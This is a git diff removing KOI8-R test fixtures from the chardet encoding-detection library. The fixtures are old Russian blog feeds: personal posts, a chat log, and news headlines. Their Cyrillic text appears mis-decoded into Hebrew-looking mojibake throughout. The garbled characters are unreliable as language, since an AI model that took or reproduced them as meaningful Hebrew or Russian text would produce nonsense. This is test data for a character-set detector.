- -tag:blogger.com,1999:blog-11182692.post-113210575690319678 -קִֹ ׃ ֵַֽֿֿ ֻֿ־ֱ... -<a href="http://photos1.blogger.com/blogger/7360/820/1024/collage10.jpg"><img style="CLEAR: all; FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/7360/820/400/collage10.jpg" border="0" /></a> <br /><br />...ףֻ׳ֿ״ ֿ׀ױֵ־־ֵ ׳ֵֹֻ<br />קֹײױ, ׳ֹײױ, װ ׃ֿ ֽ־ֿ -<br />י ׳ ׂױֵֻ װ׳ֵֿ ־ֱ׳ֵֹֻ<br />מֵֿװֻׂװ ׳ֵֵׂ ֽֿ.<br /><br />ןװװַֿֿ, װֿ ׃װֱֹּ ִֽֿׁׂ<br />ם ׳ ֱֲּײֵ־־ ַֹֽ ױִֵ׃.<br />ק ַֹֽ, ֱִַֻֿ ־ֱִ לֵװ־ֹֽ ףֱִֽֿ<br />םֵ׃ֳׁ ֿֿׂ׳ ׳ֿ׃ֵֻׂ׃ -<br /><br />ם־ֵ ־ֵ ־ֱִֿ ֿײֱִֹ־ֹ<br />ץ ׀ֿ׃װַּֿֿ ֻֿ־ֱ<br />י װֹֽֿװֵּ״־ָ ׃׳ֱִֹ־ֹ.<br />בָ! ְֲּֿ׳״ ױװֵּֿ־ֱ.<br /><br />פ ׃׳ֲִֿֿ־ֱ, ׁ ׃׳ֲִֿֿ־ֱ,<br />תֱ׳װֱׂ ּױֵ, ֵֽ ׳ֱֵׂ... <br /><br />ב.בֱָֽװֿ׳ֱ&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - -lucky - -2005-11-07T19:18:35+02:00 -2005-11-07T17:18:35Z -2005-11-07T17:18:35Z - -tag:blogger.com,1999:blog-11182692.post-113138391513670714 -interesno, znaesh' li ty, gde ona seichas? -na samo... - -
    interesno, znaesh' li ty, gde ona seichas?
    na samom dele...
    -Posted by Lucky -
    -
    -false -
    - - - -lucky - -2005-10-10T01:29:46+03:00 -2005-10-09T22:29:46Z -2005-10-09T22:29:46Z - -tag:blogger.com,1999:blog-11182692.post-112889698613197046 -*** - -
    -כֱֻ ֲ ָֿװֵּֿ׃״ ֲװ״ ׃ װֲֿֿ, ק׃£ ׳ֵֽׁׂ ׃ֱּװ״ ַּֿֿ׃ װ׳ֿ! נֹׂײֱװ״ װֲֵׁ ֻ ׃׳ֵֿ ַׂױִֹ, ׃ֱֱֻװ״: ?לְֱֲֹֽׁ, ׀ֿׂ׃װֹ!?. תֱ ַּױ׀ֵ ׃ּֿ׳ֱ ֹ ֲּֿ״, ׀ֿׂ׃װֹ! תֱ ִֵװ׃ֹֻ ׃ֵָֽ ֹ ׀ֵּֿ ׀ֹׂ־ֱ־ֹׁ. הֿ װױ׀ֿ׃װֹ ױ׀ֿׂ־ֵֿ ֱּֽֿ־ֵֹ. י ֱ ֹֽֿ ־ֹֻ£ֽ־ֵ ׃װֱֱׂ־ֹׁ. נֿׂ׃װֹ ֱ װֹ ִֹֹֿװ׃ֵֹֻ ׃װָֹֹ! י ֱ ִׂױֵַֹ, װֿ ֱִַֻֿ-װֿ ֲױִױװ! נֿׂ׃װֹ ֱ ־ֵ׃׳ֵׂ£־־ֵ ֵַָֹׂ, תֱ ־ֵ׃׳ֵׂ£־־ֵֿ ־ֵ ׃ױִׁװ! נֿׂ׃װֹ, װֿ ֵ׃װ״ ׁ ־ֱ ֵֵּֽ. נֿׂ׃װֹ! י, ֵ׃ֹּ ׳ִׂױַ ־ֵ ֲױִֵװ? נֿׂ׃װֹ, װֿ ׀ֽֿ־ְ ֿ װֲֵֵ! נֿׂ׃װֹ, װֿ ׃ֳִֵֵׂ ־ֵ ֱֲױִֵװ!? -
    -
    -false -
    - - - - -lucky - -2005-10-07T23:22:00+03:00 -2005-10-09T22:30:22Z -2005-10-07T20:22:54Z - -tag:blogger.com,1999:blog-11182692.post-112871657428923627 -no title - -
    Xxxx (10:29 PM) :
    ֱִ, ֹ ׀ִָֹֹֿׂװ׃ׁ ִ׳ֱַֹװ״׃ׁ ֱִּ״ֵ..
    Fallen_Angel (10:30 PM) :
    ֱׂ׳ֵ װֿ ׀ֿׂ׃װֿ ִ׳ֱַֹװ״׃ׁ (ֹׁׂװ״׃ׁ):-)
    ױ װֲֵׁ ֵ׃װ״ ׳׃ֵ...ֹ װַֿֿ ׳׃ֵַֿ ־ֵ ־ֱִֿ...ֲֵ
    Fallen_Angel (10:30 PM) :
    ׳׃ֵ װֱֻ װֵֵׁׂװ ׳׃ֹֻׁ ׃ֽ׃ּ: ױ ֵֽױ ׃װֵֹּֽׂ׃ׁ, ֿ ֵֽ ֵֽװֱּ...
    Xxxx (10:31 PM) :
    װ ׀ֿװֱֵּׁׂ ְֲַֹּֽֿֿ ֵּֿ׳ֱֵֻ?
    Fallen_Angel (10:32 PM) :
    ֱֱַ, ױ ֵֽ־ׁ ֵַֿ ׀ֿׂ׃װֿ ױ׳ֵֹּ: װֱֻ ֱֲ־ֱּ״־ֿ..
    ־ֱֵ״ ֱֻֻ? װױ׀ֿ..ֵֵׂ ֱ׃״ֻױ...ׁ ִֿ ׃ָֹ ׀ֿׂ ־ֵ ַֽֿױ ׀ֿ־ׁװ״...
    Fallen_Angel (10:33 PM) :
    ֱ װֿ ־ֵ ַֽֿױ ׀ֿ־ׁװ״- ׀ֿׂ׃װֿ ־ֵ ַֽֿױ ׀ֱֵָֿׂװ״, ֱֻֻ װ ַֿ׳ֹֿׂ״ ִ׳ֱַֹװ״׃ׁ ֱִּ״ֵ:
    ׁ ׀ֿׂ׃װֿ-׃ּֿײ־ֿ ־ֵ ׀ֿ־ְֱֹֽ...
    Xxxx (10:34 PM) :
    פֱִַֿ ־ֵ ױֲֹ׳ֱ׃ׁ, װֿװ, ַֻֿֿ ֽֿײ־ֿ ױ׳ֵ׃װֹ, ־ֵ ֽ־ַַֿֿֿ ׃װֹֿװ. פ׳ֿ ֱַּ׳־ ֽױײֹ־ֱ ײִ£װ װֲֵׁ ׳׀ִֵֵֹׂ, ֱִֹׂ ־ֵַֿ ־ױײ־ֿ ִֹװֹ ֱִּ״ֵ....
    Fallen_Angel (10:34 PM) :
    װֱֻ ׳׃ֵ ׀ֵֵֵֻׂׂ־ױװֿ...ׁ ֱֲּ ק׃ֵֵּ־־ֿ,
    Fallen_Angel (10:35 PM) :
    ־ֱֵ״ ׳ ֵֽ ׀ֹֻּֿׂ...װֿ ־ֵ ֲּ ֽױײֹ־ֱ...
    ׳ִָֿ־ֹ....ֽ־ֵ ֹ־װֵֵׂ׃־ֱ ֱֳֵֹֻׁׂ...:-)
    Fallen_Angel (10:36 PM) :
    װֿ ֱֲּ ֽֿׁ ׃ױִ״ֱֲ...
    Fallen_Angel (10:36 PM) :
    ׁ װֿ װֱֻ ־ְֱ....
    Fallen_Angel (10:36 PM) :
    ֲֵ ֱֱִַ־ֹ ־ֱ׳ֵׂ־ֱֻׁ...
    Xxxx (10:36 PM) :
    ־ֵ ׳ֱײ־ֿ..
    מֱֿ׳ֵֽ ׀ֿׂ׃װֿ ְֲֹּֽֽ ֵּֿ׳ֵֻֽֿ
    Fallen_Angel (10:37 PM) :
    ־ֱֵ״, ׁ װ׃ׁױ ֱׂ ַֿ׳ֱֹּֿׂ ֱ 4 ֱִַֿ "ְְֲּּ"
    ֱ ַּױֲֹ־ױ ׃ֽ׃ֱּ ֿ׃ֿ־ֱֱּ, װּֿ״ֻֿ ֱִַֻֿ ֿ־ֱ ֹ׃ֱֵּ ׃ ֵֽֿ ײֹ־ֹ....
    װֱֻ ׃װֱׂ־־ֿ...
    Xxxx (10:39 PM) :
    װֱִַֿ ְֲֹּ ֱִּ״ֵ, ְֲֹּ ׳׃ֱִֵַ,
    ׳ִֵ״ ־ֱ׃װֱֿׁׁ ְֲּֿ׳״ ־ֵ װֲֵׂױֵװ ־ֱֱִַׂ ֹ ׀ֵֿֿׂ־ֹׁ
    Fallen_Angel (10:40 PM) :
    ׀ֵׂ׳ ֵּֿ׳ֵֻ, ֻֿװֿׂ ׀ֿ־ּׁ, װֿ ׁ ְְֲּּ ֵֵ ־ֵ ׃ֽֿװׁׂ ־ֹ ־ֱ װֿ!
    ׳׃ֵ ִׂױֵַֹ ַֿ׳ֿׁׂװ- ֱֲױִ״, ־ֱװֹ ײֹ־״ ֱ־ֿ׳ֿ ֹ װ.ִ.:-(
    ׁ װֱֻ ׃ֻױְֱ ׀ֿ ־ֵ...
    -
    Fallen_Angel (10:41 PM) :
    ׁ װֱֻ ־ֵ ַֽֿױ ֱֵֽׂ־ׁװ״׃ׁ ־ֱ ֱֳֹּ, ׳ ֻֿװָֿׂ ־ֵװ ֵֵ...
    Fallen_Angel (10:42 PM) :
    ֿ־ֱ ֱֱֱֱֻּ ֵֽ־ׁ ׳ ֳֵֹּװֵּ״־ֳֹ, װֲֿ ֵֽ־ׁ ׳ֵֹֹּּ ֿװ ־ֵֵ...
    Fallen_Angel (10:43 PM) :
    װֲֿ ׁ ֱֱֲּ, װֲֿ ֽ־ֵ ־ֵ ֲּֿ װֱֻ ֲּֿ״־ֿ...
    Fallen_Angel (10:43 PM) :
    ֿ־ֱ ־ֵ ׀ֿ־ֱֵֹֽװ...
    Xxxx (10:43 PM) :
    מֱֵװ לֹֹּװ- װֿ ֵׂ־ֱׁ ּױ־ֱ
    ס װֱֻ ײֵ ׃ֻױְֱ ֲֿ ױװֱֵׂ־־ֽֿ ֽ־ֿ ֵּֿ׳ֵֵֻ, ־ֿ ֽ־ֵ ־ֵַֹֿ ־ֵ ֿ׃װֱֵװ׃ׁ, ֱֻֻ װּֿ״ֻֿ ֹּֽֿװ״׃ׁ ֿ ־£ֽ...
    -
    Xxxx (10:45 PM) :
    ת־ֱ, װֿ ־ֱֱֹֻֻׁ ֲּֿ״ ־ֵ ִֹּװ״׃ׁ ׳ֵ־ֿ.
    Fallen_Angel (10:45 PM) :
    ־ֱֵ״, ֹֽׂ ׃װֱ־ֿ׳ֹװ׃ׁ װֱֻ ֲֵ׃ֽ׃ֵּ־, ַׂױֲ ֹ ־ֵ׳־ֿ׃ֹֽ, ֱִַֻֿ ׀ֹֿׂ׃ִָֿׁװ ׳ֵֹ ׳ִֵֿׂ װָֹ...
    Fallen_Angel (10:45 PM) :
    ׁ ֱֱֲׂ־...׳ֵׂ־ֵֵ װֳֵֵּ ֿׂײִֵ־־ ׳ ִַֿ ֱֲֻ...ױ ֵֽ־ׁ װֿ ױײֵ ׃ ֵֶ׳ֱּׁׂ ֵֽ׃ֱֳׁ...
    Fallen_Angel (10:47 PM) :
    ׁ ׀ֿׂ׃װֿ ְֱַֹׂ ׳ ֿױ : ׃ֱֽױ ׃ֲֵׁ ׃ֱ׃װֹּ׳ױְ ־ֱ ְִָּׁ...
    ִֽֿֿ ׳ֿ׳ֱֱׂװ״׃ׁ ׀ֿׂ׃װֿ ־ֵ׳־ֿ׃ֹֽֿ....
    Fallen_Angel (10:48 PM) :
    ֿ־ֱ ֿ׃װֱ׳ֱֹּ ׳׃ֵ װֿ, װֿ װֱֻ ְֱֲֹּּ...
    Xxxx (10:48 PM) :
    ׀ֿׂ׃װֿ ױֲּ־ֹ׃״,
    ֵ׃ֹּ װ ְֲֹּ״, ִּֿײֵ־ ֲװ״ ׃׳ֵװ, ְֲּ׳ֹ ־ֵ ֲ׳ֱֵװ ֲֵ ׃׳ֵװֱ, ֱִײֵ ֵ׃ֹּ ֲּֿ״־ֿ
    Xxxx (10:49 PM) :
    ֹ ׃ֱֻײױ װֲֵֵ ־ֱ ױֻֿ:
    קףפעסטמיףר ֹ ׀ֵֵׂ׃װֱ־״ ׃ֲֵׁ ײֱֵּװ״
    Fallen_Angel (10:49 PM) :
    ׁ o'k... ׁ ׳ ׃ֱֽֽֿ ִֵֵּ ױְֱֲּ׃״: ׁ ֱֱִׂ ֱֻײִֽֿױ ׃ּֿ־ֵ־ֽֿױ\ִֿײִֹּ׳ֽֿױ ִ־ְ...
    ְֲּֿ ֵֹּֽֿ, ־ֿ װֿ ׳׃ֵ ־ֵ װֿ ֲֵ ־ֵֵ: ׁ ׀ֱֱֵּּּׂ״־ֿ ײֹ׳ױ ׃ֱֱֽ ׃ ׃ֲֿֿ...ׁ ־ֵ ־ְֱ ֱֻֻ װֿ ֲֿ״ׁ׃־ֹװ״...
    ־ֹֻװֿ ׃ֲֵׁ ־ֵ ײֱֵֵּװ...
    Fallen_Angel (10:50 PM) :
    ױ ֵֽ־ׁ ׳׃ֵ ֵ׃װ״, ׁ ֱֲ׃ְּֿװ־ֿ ׃ֱִֽֿֿ׃װֱװֿ־ ֵּֿ׳ֵֻ...ֽ־ֵ ־ֵַֹֿ ־ֵ ־ֱִֿ ֲֵ ֵֹֽ־־ֿ ־ֵֵ...
    Xxxx (10:51 PM) :
    ֵ׃װ״ ֱ־׃, װֿ ֿ־ֱ ׳ֵׂ־£װ׃ׁ?
    Fallen_Angel (10:52 PM) :
    ־ֵ ־ְֱ, ֿ־ֱ ַֿ׳ֹֿׂװ, װֿ ְֲֹּװ ֵֽ־ׁ. ־ֿ ױײֵ ׀ֿ-ִׂױַֽֿױ...
    ׁ ־ֵ ׳ְֵׂ ־ֹ ִֵֹ־ֽֿױ ֵֵ ׃ּֿ׳ױ...׳׃ֵַֿ װֱֻ ֽ־ַֿֿ, װֿ ֽֿײ־ֿ ׀ֹ׃ֱװ״ ֲֵ׃װ׃ֵֵּּׂ...
    Fallen_Angel (10:53 PM) :
    ֿ־ֱ ׀ֿׂ׃װֿ ׃׀ֱֱֹּּ׃״. ׁ ׀ֿׂ׃װֿ ֱַּֽֿ ־ֵַֹֿ ־ֵ ױ־ֱװ״, ֽֿײֵװ ֲװ״ ֿ־ֱ ֲ ֱִײֵ ׃ֱֵ׃ ֱֲּ ֲ ֱִֽֿ...
    ֹ־ֱִַֿ ׁ ִױְֱֽ, ׃װֹּֿֿ ֹּ ֽ־ֵ ֵּװ״ ׳ ֵֵ ֻֽֿ׀...
    Fallen_Angel (10:53 PM) :
    ׳ֵׂ־ֵֵ ׳ ֽֿ, ֻֿװֽֿׂ ֿ־ֱ ׀ּֿ״ֿ׳ֱֱּ׃״....
    Fallen_Angel (10:54 PM) :
    ׀ֿװֽֿ, ֿ־ֱ ִ־ֹֽׁ ֽֿײֵװ ־ֱ ֱֲׂװ״ ׃ֿװֿ׳...
    Fallen_Angel (10:55 PM) :
    ׀ֿװֽֿ ׀ֿׂ׃װֿ ׀ֿ׳ֿ־ֹװ״ ֹ ׃׀ֿׂ׃ֹװ״ ֱֻֻ ױ ֵֽ־ׁ ֱִֵּ?:-)
    Fallen_Angel (10:55 PM) :
    ֵֽ־ׁ ־ֱֹ־ֱֵװ ֹֻּ־ֹװ״ װֱֻ, װֿ ׁ ־ֵ ַֽֿױ ׃ֱֱֻװ״ ֹ ׃ּֿ׳ֱ...
    Fallen_Angel (10:56 PM) :
    ֿ־ֱ װֱִַֿ ױֲֵײֱִֵװ׃ׁ. װֿ ֵ ־ֵ ׃װֹּֿֿ ׳ֿ־ֹװ״ ....ֲִֵׂ...
    ׁ ָֿױ ִׂױַֿ ֲַּֿױ׃....
    Xxxx (10:56 PM) :
    ׳ֱֽ ־ֱִֿ ֱֱֲֿׂׂװ״׃ׁ ֵֽײִױ ׃ֲֿֿ,
    ֽ־ֵ ֲּֿ״ֵ ־ֵֵַֿ ׃ֱֱֻװ״ ...
    -
    Fallen_Angel (10:56 PM) :
    ׀ֿ ִֵֵֹ ֿ־ֱ ֲױִֵװ ײֹװ״ ׳ װ׳ֵֽֿ ִֵַֿֿׂ...
    Fallen_Angel (10:57 PM) :
    ֽ ׃װֿ ֱׂ ֱֱֲֹֹּׂׂ׃״...ֿ־ֱ ְֲֹּװ ־ֱ׃ ִ׳ָֹֿ...װַֿֿ ֻבֱּ ֹ ֵֽ־ׁ...
    Fallen_Angel (10:58 PM) :
    ױ׳׃װ׳ֿ ׳ֹ־ ֱֵֵֽװ ֵ ׳ֵׂ־ױװ״׃ׁ: ֿ־ֱ ִױֱֵֽװ, װֿ ֱׂ־ֿ ֹֹּ ׀ִֿ־ֿ ֵֹֽ־־ֿ ֹ=ֱ װַֿֿ ֽ ׳ ֹװֵַֿ ֱִֵֽֿׂ׃ׁ...
    Fallen_Angel (10:59 PM) :
    ־ֱֵ״, ׁ ׀ֿ׳ֿ־ֱֹּ ֵַֿ ִֹֿׂװֵּֽׁ ׳ כנ...
    Fallen_Angel (11:00 PM) :
    ֽ־ֵ װֱֻ ׳ֱײ־ֿ ֲּֿ ־ֱװ״, ֱֻֻ ֿ־ֹ ֿװ־ֿ׃ׁװ׃ׁ ֻ װֽֿױ, װֿ ָֹ ׃־ "׳ֿײֱֵּּ ײֵ־ױ ֲֹּײ־ֵַֿ ׃׳ֵַֿֿ" ־ֱׁ ֿ װֽֿ, ֱֻֻ װֿװ ֲֹּײ־ֹ ׃װֱֱִֵׂװ ֿװ װַֿֿ, ֹ ־ֱֵ״ װֿ?
    Fallen_Angel (11:04 PM) :
    ֵַֿ ֱֱֻֽֽֿ ֹ׃׀ױֱֱַּ׃״, ׀ֿ׳ֱֱּ ׀ֱ׀ֻֿױ, ׀ֱ׀ֱ ׃ ֱֽװֱֹֽ ֵֽ־ׁ ׀ֿ׃ֱּּ ֹ ׃ֱֱֻּ, װֿ ֿ־ ׃װֿ ֱׂ ׳ֱֹּּ ׳ ױײֵֹ ײֹ־ֹ ֹ װּֿ״ֻֿ ִַֹֿׂװ׃ׁ װֹֽ, ׀ֿ׃ֿ׳ֵװֿ׳ֱּ ֽ־ֵ ׀ֿׂװֵׂ׳ֵװ״, ָֿװׁ ׁ ־ֵ ׀״ְ ׳ֲֵֿֿ...־ױ, ׳ ֲֵֽֿ צֵ־״ֱֻ ׳ ָָֹֿֿׂ ׂױֱָֻ...
    Fallen_Angel (11:04 PM) :
    װֹ ְִֹּ ׃ֱֹֽ ְֱִֵּװ װֿװ ֹֽׂ װֱֹֻֽ ־ֵ׳־ֿ׃ֹֽֽ...
    -
    -false -
    - - - - -lucky - -2005-07-11T00:11:33+03:00 -2005-07-10T21:11:33Z -2005-07-10T21:11:33Z - -tag:blogger.com,1999:blog-11182692.post-112102989342403583 -ף׀ֹ׃ֻֿ ׃ֱ׃װֹּ׳ֱֹֻ - -
    ֳֹ־ֹֽ -
    ַֹֽֿ -
    ׃ֹּ״־ֵֿ ױִֿ׳ֵּװ׳ֵֿׂ־־ֵֿ ײֱֵּ־ֵֹ ׃ֵֻ׃ֱ (־ְֲֵּ׳ֹ) -
    ֱ׃ֱֳֹּֿ״־ֿ׃װ״ -
    ֵֵֽׂׂ־ֵ װֲֵֿׂ׳ֱ־ֹׁ ֻ ֲֹֹֻּֽ -
    ֿײֵ׃װֿ£־־ֵֿ ֱׂ׳־ִֿױֵֹ ֻ ֻֿׂױײְֱֹֽ -
    ֱָֿװֹ־ֿ׃װ״ ֹ ׀ֵֵֵֽׂ־ֹ׳ֿ׃װ״ ׀ֲֿױײִֵ־ֹ -
    ֿװ׃ױװ׃װ׳ֵֹ ׃ֶֹֽֿֿׂׂ׳ֱ־־ָ ֱּֽֿׂ״־ָ ױ׃װֱ־ֿ׳ֻֿ -
    ֲֵ׃׃ֹּ״־ֵֿ ֱֲֵֵֹֹּׂ ֻ ׳ֵ׀ֵֵֹׂ׃ֵּ־־ֽֿױ -
    -
    כֱֻ װּֿ״ֻֿ ׁ ׳ִֹֻ׳ְֱ ֵּֿ׳ֱֵֻ ֹ ׃׳ֵֿ ײֹ־ֹ ...ֿ־ ׀ֿׁ׳ֵּׁװ׃ׁ..:) -
    ֹ ׳׃ֵ ־ֱֹ־ֱֵװ׃ׁ ׃־ֿ׳ֱ:)ם ֱ׃װֿ ֿװֱֵֵֻֽׂ׃ׁ ֿװ ַֻֿֿ-װֿ, ֿװֱֵֵֽׂ ׃ֱׂױ, ִױֱֽׁ, װֿ װֱֻ ֵֽ־״ֵ ֲֹּֿ.ם ֱֻׂ׳ֱֵֽ ִ׳ֵֹׂ ־ֱַּױָֿ,ֱֻֻ ֹֻׂ׀ֹ־ֱׁ ׃װֵ־ֱ ֹֹּ ׀װֱֵֽ׃ׁ ױֱֱֻװ״ ־ֱ ־ֵֵ ֱֻֻ ֲױִװֿ ׳ ־ֵֵ ֽֿײ־ֿ ׳װֹ. -
    ם ױִָֹֽֿ ֹ ־ֵ ֱֲֹֿֿׂ׳ֱֵֽ׃ׁ, ָֿװׁ ־ֱ ׃ֱֽֽֿ ִֵֵּ ֵ£ ִַּֿֿ ֽ׃ֵּ־־ֿ װֱֽ ־ֱִָֹֽֿ׃ׁ. -
    פֵװ־ֿ ׀װֱֵֽ׃ׁ ֿװֿׂ׳ֱװ״׃ׁ ֿװ װֵ־ֹ, ־ֿ ׀ֿ־ֱֵֹֽֽ, װֿ ֿװ ־ֵ£ ־ֵ ֱֲֹ׳ֹװ״׃ׁ, ֽֿײ־ֿ ֹּ״ ־ֵ ֱֱֲֿׂװ״ ׳־ֱֹֽ־ֹׁ ־ֱ ־ֵ£ ֹֹּ ׀ֱֽֿװ״ ־ֿ׳ױְ.. -
    ֱֻֻ ׀ֿ־ֱׂ׳ֹװ׃ׁ....נֵּֿֿׂ ׀ֿׂ׃װֹװ״ ׃ ׀ֿ׃ִֵּױְֹֽ ֱֲ׳ֵ־ֵֹֽ... -
    ֹֹּ -
    מֱִַֹֻֿ ־ֵ ֲװ״ ׀ֵֿׂ־־ֽ.. ־ֿ ֹ ׳ֵ־ֿ ־ֵ ֱֲװֽ... -
    ֹ ־ֵ ׀ֿׂ׃װֹװ״ ֹ ׳ֵ־ֿ ־ֵ ֱֲװ״...י ־ֱִַֹֻֿ ֲּֿ״ֵ ־ֵ ֱֲֵּֿװ״ ־ֵֵֹֹּֽֿ ֲֵּֿ־״ְ, ֻ ֻֿװֿֿׂ ױײֵ ׳ֱֲֿׂװֱ־ ׃װֹֻֿ ֹֽֽױ־ֹװֵװ, ִֹװֹ ׀ֿ ײֹ־״ֽׁ ־ֿ׳ָ װֵ־ֵ ׃ֻּֿ״ׁ ֹ ־ֵ ׃׳ֱׁ־ֿ ֲֹֻּֿ,׀ֿ־ֱֹֽׁ, װֿ ־ֵַֹֿ װֱַֻֿֿ ־ֹ ׳ ֻֽֿ ־ֵװ, ֱֻֻ װַֿֿ ־ֵ ֲּֿ ֹ ִֿ װַֿֿ, ׳׃ֵ ׀ִֹׂױֱֽ־ֿ ֹ ֱִֵֹֹֹּֿׂ׳ֱ־ֿ ׀ֿׂ׃װֿ ׳ ֱַָֽֿ.םַֿ ֵּֿ׳ֱֵֻ ִֿ ׃ָֹ ׀ֿׂ ׳ֿ׃״ֵֽֿ ױִֿ ׃׳ֵװֱ,װֵֽ ֲֵֵּֿ ֹֽֿ. -
    -
    -
    -false -
    -
    diff --git a/chardet/tests/KOI8-R/kapranoff.ru.xml b/chardet/tests/KOI8-R/kapranoff.ru.xml deleted file mode 100644 index d17abc6..0000000 --- a/chardet/tests/KOI8-R/kapranoff.ru.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -Kappa's Lair v2.0 -http://kapranoff.ru/ - -en-us - -2003-12-18T17:40:29+03:00 - - - - - - - - - - - - - - - - - - - - - - - - - -׀ױְּֽ-׀ױְּֽ -http://kapranoff.ru/archives/003663.html - - -kappa -2003-12-18T17:40:29+03:00 - - -זּֿ״ֻּֿׂ -http://kapranoff.ru/archives/003662.html - - -kappa -2003-12-18T15:46:04+03:00 - - -<![CDATA[ב ׳ ַֿ׳ֹֿׂװֵ — ִ־ֵ׳־ֹֹֻ...]]> -http://kapranoff.ru/archives/003661.html -ץ־ֱֹֻּ״־, ־ֱ ֽֿ ׳ִַּׁ, ׀ִֿׂױֻװ ֵֻֻּּֿװֹ׳־ַֿֿ װ׳ֵֿׂ׃װ׳ֱ. כ־ֱַֹ ֱֳֵּׁ. מֵ ׀ֿײֱֵֵּװֵ. כֹֻֿ ֻֽֿ. ןִ־ֱײִ ׃ּֿ־ֵ־ֿ ׀ֿֿׂ, גּ ִֵ־״ ִֿײִֹּ׳ ֹ... - -kappa -2003-12-17T16:54:58+03:00 - - -םױ־ִֹּֿ־ֱ -http://kapranoff.ru/archives/003660.html -עױ׃׃ֹֻ ׃ֱװ ֿ ַױֲ־ָ ֱֱַָֻֽֿׂ ֹ ֵַֹׂ ־ֱ ־ָֹ. כֱֶ. הֱ׳־ֿ ָֿװֵּ ־ֱ׀ֹ׃ֱװ״ ֿ ־£ֽ, ֱִ ׳ֿװ ֱֲ׳ֱּ ׳׃£. Lonesome... - -kappa -2003-12-17T13:49:03+03:00 - - -ֱֲֻֻֽ -http://kapranoff.ru/archives/003659.html -תֱִׂ׃װֵ ׳ֱֽ ׃ ָ׳ֿ׃װֹֻֽֿ. ס ַֽֿ ֲ ֽ־ַֿֿ ־ֱ׀ֹ׃ֱװ״ ֿ װֽֿ, ֵֽ ֱ־ֱֹּֽ׃ׁ ׳׃ְ װױ ־ְִֵֵּ. ם־ֵ ֵּ־״. ן׳ֹ־ֱֻ ־ֵ... - -kappa -2003-12-17T13:42:39+03:00 - - -כֵֽ ֲװ״? -http://kapranoff.ru/archives/003657.html -ףֲֵׂ־ִֹּ, ׳ִֹֹֽֿ, ׳ֱ ׀ֻֿֿׂ־ ׃ ױֱֽ ׃ֿ׳׃ֵֽ ֿװ ֲִֵֵּ״ׁ. ףֹײױ ׳ֿװ, װֱׂױ ֲֵױֽ־ֵ ִֵ־״ַֹ ׳ ֲׁׂ־׃ֻֽֿ ֹ־װֵׂ־ֵװֵ, ׀ָֿֿׂײױ װֵ׃װ ־ֱ... - -kappa -2003-12-13T12:15:13+03:00 - - -הֵ־״ ֻֿ־׃װֹװױֳֹֹ -http://kapranoff.ru/archives/003656.html -‏ֵּֿ׳ֵֵֻ, ֻֿװֿׂ ׃ֱִֵּּ ֵֽ־ׁ ֱֵּֽֽֿ־ֽֿ, ׃ִֵַֿ־ׁ ֿװֱֵֵֽװ ׃׳ֿ£ ִֵ־״ֿׂײִֵ־ֵֹ :) ץֱׂ, ׁ װֱֻ ׀ְֱֱַּֿ, ֱִ ׳ִֵ״? נֿ׃׳ְֱׁ ֵ ׳ִָֿ ׳װַֿֿֿׂ... - -kappa -2003-12-12T15:18:10+03:00 - - -ּװֲִׂ -http://kapranoff.ru/archives/003655.html - - -kappa -2003-12-09T17:51:23+03:00 - - -ףֱֵֽֿ ֿ־ֿ -http://kapranoff.ru/archives/003646.html - - -kappa -2003-12-07T23:09:31+03:00 - - -ף׀ֿׂװ-ֻ׃׀ֵׂ׃׃ ׃ֱֲֵֿֿװ -http://kapranoff.ru/archives/003654.html - - -kappa -2003-12-06T18:19:27+03:00 - - -תֵּֽׁ־ֵ-3 -http://kapranoff.ru/archives/003653.html - הֵ׳ֱֻֿ ֹ ֱֱִּ-ֱֱּֽ. חֵ־ֱֹּ״־ֿ. תִֵ׃״ ׳׃£.... - -kappa -2003-12-05T13:34:08+03:00 - - -םױֱֻ ׃ ־ֱֹֽ -http://kapranoff.ru/archives/003652.html - כױ׀ֹּ ׳ֿװ. נֱִֿֿׂ׳ֱּ ׃װֱֱֹֻׂ. ףֲֵׁ.... - -kappa -2003-12-04T19:56:54+03:00 - - -מֿ׳ֿ׃װֵ־״ -http://kapranoff.ru/archives/003651.html -ב ױ׃ֱװ עֵ׳ֹֻׁ־ ׃ֿ װֿ׳ֱֹֹׂ ֱֱֻ־ֹ׳ֱֵװ ֱ׀ֹ׃״ ־ֿ׳ַֿֿ ֱּ״ֱֲֽֿ. ק ׃ױֲֲֿװױ ֿ־ֹ, ֻ׃װֱװֹ, ֲױִױװ ׳ דהט. ס ֽֿײֵװ ֲװ״ ׃ָֿײױ.... - -kappa -2003-12-04T18:58:46+03:00 - - -ףֹ־ֹ ׳ּֿ, ֹ׃׀ּֿ־ֵ־־ ֵֿ -http://kapranoff.ru/archives/003650.html -גח ֿ ׳׃ֻֽֿׁ ֱׂ־ֽֿ. נֹֽֿװֵ, ֵ׃װ״ ׁ, ׁ ׀ֹױ ׀ֵ׃־ֹ, ׁ ָֹ ׀ְֿ, ױ ֵֽ־ׁ ֵ׃װ״ ׃׳ֿׁ ׃װֵװֱֹֻ. י ֵ׃װ״... - -kappa -2003-12-03T22:44:54+03:00 - - -׳ײֹֻ-׳ײֹֻ -http://kapranoff.ru/archives/003649.html -ב ׁ, ֵֽײִױ װֵֽ, ׳ֵׂ־ױּ׃ׁ ֹ גׁׂ־׃ֱֻ. פֱֵֹֻ ֱִֵּ.... - -kappa -2003-12-03T11:37:49+03:00 - - - - diff --git a/chardet/tests/KOI8-R/koi.kinder.ru.xml b/chardet/tests/KOI8-R/koi.kinder.ru.xml deleted file mode 100644 index e4f6b32..0000000 --- a/chardet/tests/KOI8-R/koi.kinder.ru.xml +++ /dev/null @@ -1,372 +0,0 @@ - - - - -Kinder.ru - הֵװ׃ֵֹֻ ־ֿ׳ֿ׃װֹ -http://kinder.ru/ -Kinder.ru - הֵװ׃ֵֹֻ ־ֿ׳ֿ׃װֹ -ru -otter@kinder.ru -kinder -10 - -http://www.kinder.ru/banners/just-button3.gif -מֿ׳ֿ׃װֹ Kinder.ru -http://kinder.ru/ -88 -31 -kinder.ru - - - - -הֵװ׃ֹֻ ײױׂ־ֱּ "כּ£׀ֱ" -קֵּ ֵֶ׳ֱּׂ״׃ֹֻ ־ֵֽֿׂ "כּ£׀".
